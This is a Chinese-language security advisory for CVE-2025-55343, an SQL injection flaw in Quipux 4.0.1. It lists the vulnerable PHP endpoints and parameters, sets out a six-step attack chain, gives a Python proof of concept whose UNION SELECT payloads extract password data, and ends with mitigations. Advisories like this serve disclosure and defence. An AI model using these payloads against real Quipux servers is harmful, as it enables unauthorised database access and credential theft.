CVE-2025-55343 Quipux 4.0.1 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-55343

漏洞类型

SQL注入

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Quipux

漏洞概述

CVE-2025-55343是Quipux文档管理系统中的一个严重SQL注入漏洞，CVSS评分高达9.9（严重级别）。该漏洞影响Quipux 4.0.1至e1774ac版本，允许经过身份验证的低权限用户通过多个PHP端点注入恶意SQL语句。攻击者可利用此漏洞在服务器上执行任意SQL命令，从而获取敏感数据、修改数据库内容，甚至在某些情况下实现远程代码执行。由于攻击向量为网络传播且无需用户交互，漏洞利用门槛较低，对使用Quipux系统的组织构成重大安全威胁。漏洞涉及多个功能模块，包括搜索、文档管理、行政列表和文件上传等功能。

技术细节

Quipux系统中的SQL注入漏洞存在于多个PHP文件中，主要涉及以下端点和参数：1) busqueda/busqueda.php的txt_depe_codi和txt_usua_codi参数；2) anexos_lista.php的radi_temp参数；3) Administracion/listas/目录下的formArea_ajax.php、formDepeHijo_ajax.php和formDepePadre_ajax.php的codDepe和codInst参数；4) asociar_documentos/目录下多个文件的radi_nume和txt_radi_nume参数；5) radicacion/目录下多个文件的buscar_tipo、codDepe和destinatorio参数；6) reportes/reporte_TraspasoDocFisico.php的verrad参数；7) tx/目录下多个文件的txt_usua_codi、nume_radi_temp、txt_radi_nume、codigo_opc和txt_radicados参数；8) uploadFiles/cargar_doc_digitalizado_paginador.php的txt_depe_codi参数。这些参数在接收用户输入后未经过充分的输入验证和SQL语句参数化处理，直接拼接到SQL查询语句中。攻击者可通过构造特制的恶意输入，利用UNION SELECT、布尔盲注或时间盲注等技术提取数据库中的敏感信息，包括用户凭证、系统配置和文档内容。

攻击链分析

STEP 1

步骤1

攻击者获取Quipux系统的有效用户凭证（可通过社工、凭证填充或其他方式）

STEP 2

步骤2

使用低权限账户登录Quipux系统，获得会话令牌

STEP 3

步骤3

识别存在SQL注入漏洞的PHP端点，如busqueda/busqueda.php或asociar_documentos/asociar_documento_buscar_query.php

STEP 4

步骤4

构造恶意SQL注入载荷，通过HTTP请求发送至目标端点，如使用UNION SELECT提取数据库用户表信息

STEP 5

步骤5

利用注入点获取管理员凭据或其他敏感数据，如用户密码哈希、系统配置信息

STEP 6

步骤6

根据获取的凭据提升权限或横向移动，可能实现远程代码执行或完全控制数据库

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-55343 SQL Injection PoC for Quipux
# Target: Quipux 4.0.1 through e1774ac

TARGET_URL = "http://target-ip/quipux/"

# SQL Injection payloads for different endpoints
PAYLOADS = {
    "busqueda/busqueda.php": {
        "params": {"txt_depe_codi": "1' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -",
                   "txt_usua_codi": "1"},
        "method": "GET"
    },
    "asociar_documentos/asociar_documento_buscar_query.php": {
        "params": {"radi_nume": "' OR '1'='1"},
        "method": "GET"
    },
    "tx/tx_realizar_tx.php": {
        "params": {"txt_radicados": "' UNION SELECT password FROM usuario-- -"},
        "method": "POST"
    }
}

def test_sqli(endpoint, params, method="GET"):
    """Test SQL injection vulnerability"""
    url = TARGET_URL + endpoint
    try:
        if method == "GET":
            response = requests.get(url, params=params, timeout=10)
        else:
            response = requests.post(url, data=params, timeout=10)
        
        # Check for SQL error indicators
        if any(err in response.text for err in ["mysql", "sql", "syntax", "error"]):
            return True, response.text[:500]
    except Exception as e:
        return False, str(e)
    return False, ""

if __name__ == "__main__":
    print("[*] CVE-2025-55343 SQL Injection Test")
    print(f"[*] Target: {TARGET_URL}")
    
    for endpoint, config in PAYLOADS.items():
        print(f"\n[*] Testing: {endpoint}")
        vulnerable, details = test_sqli(endpoint, config["params"], config["method"])
        if vulnerable:
            print(f"[+] VULNERABLE: {endpoint}")
            print(f"[+] Details: {details}")
        else:
            print(f"[-] Not vulnerable or timeout")

影响范围

Quipux < 4.0.1

Quipux 4.0.1 through e1774ac

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制Quipux系统的访问范围，仅允许受信任的IP地址访问管理界面；2) 实施强密码策略和多因素认证，防止凭证被盗用；3) 在Web应用层部署输入验证和过滤规则，临时拦截包含SQL特殊字符的请求；4) 监控数据库查询日志，及时发现异常的SQL注入行为；5) 考虑使用虚拟补丁技术，在应用前端阻断已知的攻击模式；6) 对受影响功能实施临时访问控制，限制低权限用户的敏感操作能力。